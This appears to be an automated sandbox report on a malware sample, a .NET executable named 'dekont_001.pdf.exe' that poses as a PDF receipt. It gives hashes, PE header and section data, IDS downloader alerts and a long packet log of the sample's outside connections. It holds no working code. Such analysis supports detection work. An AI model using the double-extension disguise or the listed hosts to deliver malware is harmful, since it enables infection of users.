                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):6.028687878926887
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:dekont_001.pdf.exe
                                              File size:76'288 bytes
                                              MD5:d998da7be623b6299e9257fcf5f80e3e
                                              SHA1:91d22e36b0aa0484136b1ee6ae17abb1f4963927
                                              SHA256:4bb7ad555a0641fd9020b58ac7fdeb4eab618214f056a489739ad6aa91f528ae
                                              SHA512:2c842a461f28225f1cb87a7a904593789f22e5a8f4a33c4b445b0c50c8e07b52b708b670b110ac006be5c997dc8d5b20bf874448abaaeb7a8f817f9f839df597
                                              SSDEEP:1536:s2bQcZBZbO8nKwK3Px4wSa43VZFnWFCH2n8yIejHBoswZDg7uj:s2bQF8CPbS71WFCW00HqswRgG
                                              TLSH:74732C3C579C0A26DBD92579D291604C4BF1C2E94A03EB8FADDD62F91CC2FA5C846B43
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g................. ...........>... ........@.. ....................................`................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x413ebe
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x671F4D1F [Mon Oct 28 08:36:47 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x13e700x4b.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x600.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x11ec40x120004c7cc8215326fc574b7bb1e05373a385False0.5026177300347222data6.0898699311167155IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x140000x6000x600831f20fba0e57c7386b5be651253306bFalse0.4166666666666667data4.0813340041674255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x160000xc0x2009be6ea4aa8e27b68c199b91afbaa195aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x140a00x31cdata0.4296482412060301
                                              RT_MANIFEST0x143bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-28T19:04:17.171949+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731132.226.247.7380TCP
                                              2024-10-28T19:04:18.406339+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731132.226.247.7380TCP
                                              2024-10-28T19:04:19.122909+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733188.114.97.3443TCP
                                              2024-10-28T19:04:20.062755+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734132.226.247.7380TCP
                                              2024-10-28T19:04:22.531398+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737188.114.97.3443TCP
                                              2024-10-28T19:04:25.945477+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745188.114.97.3443TCP
                                              2024-10-28T19:04:27.659639+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449748188.114.97.3443TCP
                                              2024-10-28T19:04:35.218856+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753132.226.247.7380TCP
                                              2024-10-28T19:04:36.390779+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753132.226.247.7380TCP
                                              2024-10-28T19:04:37.154934+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449755188.114.97.3443TCP
                                              2024-10-28T19:04:38.078355+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449756132.226.247.7380TCP
                                              2024-10-28T19:04:40.531396+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449759188.114.97.3443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 28, 2024 19:04:06.979075909 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:06.979110956 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:06.979182959 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:06.997104883 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:06.997117996 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:08.473808050 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:08.473884106 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:08.500761032 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:08.500778913 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:08.501183987 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:08.547068119 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:08.664686918 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:08.707377911 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.021330118 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.062567949 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.181835890 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.181857109 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.181875944 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.181884050 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.181915998 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.181915998 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.181942940 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.182075024 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.182075024 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.182075024 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.300945044 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.300966024 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.301043987 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.301059008 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.301085949 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.301109076 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.420253992 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.420274973 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.420348883 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.420361042 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.420411110 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.539813042 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.539834023 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.539999962 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.540009975 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.540060043 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.658839941 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.658879042 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.659032106 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.659032106 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.659043074 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.659092903 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.778881073 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.778904915 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.779154062 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.779164076 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.779236078 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.897680998 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.897706032 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.897777081 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.897784948 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.897835970 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.942035913 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.942064047 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.942105055 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.942112923 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:09.942152023 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:09.942171097 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.060987949 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.061019897 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.061110973 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.061120987 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.061166048 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.179927111 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.179965019 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.180022955 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.180031061 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.180080891 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.259838104 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.259865999 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.259983063 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.259993076 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.260047913 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.301222086 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.301253080 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.301493883 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.301506042 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.301564932 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.425520897 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.425558090 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.425601006 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.425609112 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.425662994 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.544115067 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.544152975 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.544208050 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.544215918 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.544255018 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.544270039 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.546067953 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.546094894 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.546175003 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.546183109 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.546231985 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.667367935 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.667396069 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.667484999 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.667496920 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.667547941 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.738065004 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.738092899 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.738169909 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.738181114 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.738220930 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.787645102 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.787667036 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.787787914 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.787801027 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.787858009 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.906682014 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.906703949 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.906846046 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.906862974 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.906914949 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.908401012 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.908421040 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.908490896 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:10.908500910 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:10.908549070 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.026125908 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.026150942 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.026350021 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.026361942 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.026417971 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.097619057 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.097651958 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.097712040 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.097722054 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.097770929 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.145673990 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.145694971 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.145746946 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.145755053 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.145807981 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.216964960 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.216988087 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.217031002 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.217039108 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.217073917 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.217097998 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.265446901 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.265472889 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.265516043 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.265522957 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.265554905 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.265578985 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.336484909 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.336505890 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.336719036 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.336730003 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.336930990 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.384613037 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.384633064 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.384744883 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.384753942 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.384803057 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674160957 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674174070 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674220085 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674386978 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674386978 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674402952 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674462080 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674462080 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674477100 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674503088 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674525976 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674576044 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674581051 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674628973 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674665928 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674690008 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674746037 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.674752951 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.674804926 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675225973 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675246000 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675292969 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675299883 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675338030 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675362110 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675601959 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675621986 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675668955 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675676107 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.675709009 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.675729036 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.695163965 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.695184946 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.695252895 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.695260048 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.695327044 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.768944025 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.769002914 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.769282103 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.769290924 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.769376040 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.814063072 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.814117908 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.814161062 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.814167976 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.814237118 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.887712955 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.887736082 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.887918949 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.887928009 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.888130903 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.889146090 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.889167070 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.889226913 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.889234066 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.889281034 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.933870077 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.933892012 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.933990955 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:11.933999062 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:11.934045076 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.007637024 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.007662058 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.007755995 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.007764101 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.007833958 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.009151936 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.009177923 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.009315968 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.009322882 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.009413004 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.126240969 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.126277924 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.126395941 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.126405954 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.126458883 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.127152920 CET44349730188.132.193.46192.168.2.4
